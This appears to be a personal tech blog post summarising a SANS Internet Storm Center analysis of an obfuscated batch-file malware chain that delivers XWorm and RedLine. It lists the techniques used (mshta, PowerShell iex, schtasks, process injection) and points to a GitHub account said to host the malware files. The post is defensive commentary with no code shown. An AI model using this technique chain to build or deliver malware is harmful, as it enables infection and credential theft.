The Wiert Corner – irregular stream of stuff

Jeroen W. Pluimers on .NET, C#, Delphi, databases, and personal interests

  • My badges

    Mastodon

  • Twitter Updates

  • My Flickr Stream

    20140508-Delphi-2007--Project-Options--Cannot-Edit-Application-Title-HelpFile-Icon-Theming20140430-Fiddler-Filter-Actions-Button-Run-Filterset-now20140424-VMware-Fusion-6.0.3.-no-reclaimable
    More Photos

  • Pages

  • All categories

  • Enter your email address to subscribe to this blog and receive notifications of new posts by email.

    Join 1,854 other subscribers
«
»

The state of malware today: From Highly Obfuscated Batch File to XWorm and Redline – SANS Internet Storm Center

Posted by jpluimers on 2024/10/10

A very interesting read, where it keeps me wondering how batch files like these are being generated (making them by hand feels very surreal): [Wayback/Archive] From Highly Obfuscated Batch File to XWorm and Redline – SANS Internet Storm Center

VirusTotal entry: [Wayback/Archive] VirusTotal – File – 453c017e02e6ce747d605081ad78bf210b3d0004a056d1f65dd1f21c9bf13a9a

The day after the article was written, only Kaspersky and ZoneAlarm detected it; in the past ZoneAlarm used the Kaspersky engine, but that stopped a while ago: [Wayback/Archive] ZoneAlarm Free Antivirus Review | PCMag.

The malware uses at least these technologies:

  • obfuscation (not just by posing a wrong text encoding, but also using both empty and calculated environment variables, plus many loop + GOTO tricks)
  • batch files
  • mshta
  • wscript (using wscript.shell to execute batch files)
  • conhost (as conhost.exe 0xffffffff -ForceV1 indicating a session-less conhost)
  • doskey
  • net session and net1 session to check for administrative permissions
  • powershell (using Start-Process to execute batch files, and iex (Invoke-Expression) to run a script which downloads others scripts to run them)
  • It is not clear if ctfmon is used, and when used if this involves vulnerabilities in the undocumented CTF (Common Text Framework) protocol or a malware program with the ctfmon.exe name
  • rundll32
  • python (downloaded dynamically) to download a script which embeds an also downloaded payload into any 32-bit Windows process using various Kerlen32 techniques and the Task Scheduler:
  • schtasks

Finally it downloads the RedLine and XWorm malware.

Via: [Wayback/Archive] SANS.edu Internet Storm Center on X: “From Highly Obfuscated Batch File to XWorm and Redline …”

Related:

Queries:

Archived malware files by [Wayback/Archive] LoneNone1807 · GitHub in [Wayback/Archive] GitHub – LoneNone1807/martin and [Wayback/Archive] GitHub – LoneNone1807/RedAV (I hope that by now either the user or the repositories – more at [Wayback/Archive] LoneNone1807 (LoneNone1807) / Repositories · GitHub – are gone) in order of the above SANS blog post:

These were not included in the SANS blog post:

Repository not mentioned or (indirectly) referenced from the SANS blog post:

Links inside the repositories:

Note the GitHub user did not have any public gists at the time of writing: [Wayback/Archive] LoneNone1807’s gists · GitHub

--jeroen

This entry was posted on 2024/10/10 at 18:00 and is filed under Antivirus, Batch-Files, Development, Power User, PowerShell, Python, Scripting, Security, Software Development, Windows Development. You can follow any responses to this entry through the RSS 2.0 feed. You can leave a response, or trackback from your own site.

Leave a comment

This site uses Akismet to reduce spam. Learn how your comment data is processed.

«
»